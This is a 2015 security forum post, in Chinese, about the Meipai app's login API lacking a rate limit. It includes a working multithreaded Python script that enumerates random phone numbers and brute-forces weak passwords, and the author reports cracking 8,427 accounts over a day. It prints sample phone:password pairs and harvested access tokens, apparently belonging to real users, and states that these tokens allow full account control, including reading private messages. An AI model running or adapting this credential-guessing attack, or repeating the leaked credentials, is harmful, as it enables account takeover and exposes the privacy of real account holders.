美拍接口未限频导致的帐号随机密码碰撞-茶余饭后-看雪-安全社区|安全招聘|kanxue.com

美拍接口未限频导致的帐号随机密码碰撞

发表于: 2015-3-5 14:57 1164

美拍接口未限频导致的帐号随机密码碰撞

ntriater

2015-3-5 14:57

1164

文字转自：617K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4A6L8Y4g2^5i4K6u0W2K9h3#2Q4x3V1j5J5x3o6p5#2i4K6u0r3x3o6u0Q4x3V1j5J5x3#2)9J5c8X3#2W2K9i4m8S2K9g2)9J5k6s2m8Z5L8$3&6W2i4K6g2X3M7s2N6V1i4K6g2X3j5Y4g2J5M7q4)9J5k6h3S2@1L8h3H3`.

一个接口

美拍进行手机号登录时会对手机号先进行注册检测，接口会返回登录情况：

fefK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4A6L8Y4g2^5i4K6u0W2K9h3#2Q4x3V1k6A6L8h3q4Y4k6i4y4Q4x3V1k6V1M7$3A6S2K9h3!0V1K9X3W2K6j5h3Z5I4z5o6M7&6x3X3^5I4P5o6R3H3y4$3S2W2y4K6p5J5P5o6m8B7k6e0M7J5x3e0p5I4P5o6W2Q4x3X3g2H3L8X3M7`.

2eaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4A6L8Y4g2^5i4K6u0W2K9h3#2Q4x3V1k6A6L8h3q4Y4k6i4y4Q4x3V1k6G2K9i4f1@1x3e0u0A6L8X3y4A6L8U0S2$3z5i4S2E0x3i4g2V1M7K6R3&6j5h3c8S2M7#2)9J5k6i4m8F1k6H3`.`.

如果手机帐号存在但密码错误则提示：

39bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4A6L8Y4g2^5i4K6u0W2K9h3#2Q4x3V1k6A6L8h3q4Y4k6i4y4Q4x3V1k6S2M7$3q4B7x3e0R3%4z5e0u0F1x3i4R3^5x3o6N6Z5k6e0M7I4x3Y4R3H3K9X3f1%4x3U0p5I4x3i4R3&6i4K6u0W2M7r3&6Y4

这里我们进行频繁的手机号随机登录查询，是没有限制频率的，所以我们可以通过不断生成手机号然后验证帐号是否注册，随后进行密码破解的操作。（大量帐号的密码破解情况下，弱口令会有很大的空间。）

小脚本

随机生成手机号码
进行密码破解
进行结果存储
    #!/usr/bin/env python
    # coding=utf8
    # author=evi1m0#ff0000.cc
    # create=20150216

    import json
    import random
    import requests
    import threadpool as tp

    def _burp(phone):
        for pwd in ['123456', '123456789', '000000', phone]:
            api_url = '432K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3&6W2N6$3q4H3K9g2)9J5k6h3#2W2K9i4m8S2K9g2)9J5k6h3y4G2L8g2)9J5c8X3!0S2N6i4c8Z5i4K6u0r3j5h3y4U0k6i4y4K6i4K6g2X3N6r3!0C8k6h3&6Q4x3X3g2B7M7$3!0F1i4K6t1%4
            data = {'phone': phone,
                    'client_id': '1089857302',
                    'client_secret': '38e8c5aet76d5c012e32',
                    'grant_type': 'phone',
                    'password': pwd,}
            try:
                print '

Burp Phone: %s' % phone

                req = requests.post(api_url, data=data, timeout=5)
            except:
                continue
            try:
                success = json.loads(req.content)['access_token']
                burp_success = open('./meipai_account.txt', 'a+')
                burp_success.write('%s:::%s\n'%(phone, pwd))
                burp_success.close()
                print success
                return success
            except:
                success = 0
                print '[-] Burp False'
                continue

    def _status(args):
        flag = 0
        while True:
            flag += 1
            phone_number = random.choice(['188','185','158','153','186','136','139','135'])\
                           +"".join(random.sample("0123456789",8 ))
            data = {'phone': phone_number,
                    'client_id': '1089857302',
                    'client_secret': '38e8c5aet76d5c012e32',
                    'grant_type': 'phone',
                    'password': '1',}
            api_url = '31dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3&6W2N6$3q4H3K9g2)9J5k6h3#2W2K9i4m8S2K9g2)9J5k6h3y4G2L8g2)9J5c8X3!0S2N6i4c8Z5i4K6u0r3j5h3y4U0k6i4y4K6i4K6g2X3N6r3!0C8k6h3&6Q4x3X3g2B7M7$3!0F1i4K6t1%4
            try:
                print '[%s] Test Phone: %s' % (flag, phone_number)
                req = requests.post(api_url, data=data, timeout=3)
                req_status = json.loads(req.content)['error_code']
            except:
                req_status = 0
            if req_status == 21402 or req_status == 23801:
                success_f = open('./success_reg_phone.txt', 'a+')
                success_f.write('%s\n'%phone_number)
                success_f.close()
                _burp(phone_number)
                print '\n[OK] Phone: %s\n' % phone_number

    if __name__ == '__main__':
        args = []
        for i in range(30):
            args.append(args)
        pool = tp.ThreadPool(30)
        reqs = tp.makeRequests(_status, args)
        [pool.putRequest(req) for req in reqs]
        pool.wait()
IMG_u901jfd9x99naak.jpg

继续脚本

40a661e4551847f5762e077e48c97d76

我们进行了3台服务器的脚本部署，然后一天后进行数据统计：

success_reg_phone.txt
mp_account_data.txt
其中success_reg_phone.txt为注册美拍的帐号，mp_account_data.txt为成功爆破的美拍帐号。

去重整理之后的数据：

wc meipai_account.txt
8427    8427  198653 meipai_account.txt

wc success_reg_phone.txt
92531   92532 1110383 success_reg_phone.txt
其中成功登录8427，注册美拍的手机号92531。

head meipai_account.txt

13501235896:::13501235896
13501239874:::13501239874
13501256394:::123456789
13501264953:::123456
13501279546:::123456
13501468359:::123456
13501476253:::123456
13501526734:::13501526734
13501529843:::13501529843
13501549263:::123456
随后我们对92531个手机号码去掉已经成功登录的8427个手机号后，进行二次的密码爆破。

美拍帐号登录错误5次会进行3个小时的密码锁定，所以三个小时能进行一次新的top密码破解；

数据统计

部署脚本的第二天我们停止了测试，因为这次仅仅是为了配合接口做次弱密码统计：

cat meipai_account.txt  | awk -F::: '{print $2}' | sort | uniq -c | head

  65 000000
  98 111111
  19 123123123
5293 123456
3059 123456789
296 5201314
简单利用

帐号成功登录后会返回一个类似于新浪微博授权的access_token，所以编写脚本进行access_token的收取工作即可；

e.g:

head meipai_access_token.txt

00000027d3490ad1dd12c619fc82217a
000c2518d5e477afc15ef26b23f94c3d
001cedff4d578f454104a48523bb6b0c
0023688a2428bd56f8a530c7e38fe6c8
002812f57c139a3bcfa99a2b6f973286
00287174138355393b755705c516a456
0034285349fc1f3c8cc0fdb42dace741
003a77922fb49d48097ee91a4cb20be2
003a7e6e21088d2f3d83a6864bf922ee
00685824290db6eac554577e729fb8ec
拥有access_token后可对帐号进行任意操作，比如：关注、查看私信、个人资料信息获取等。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

#资讯

收藏・0

免费・0

支持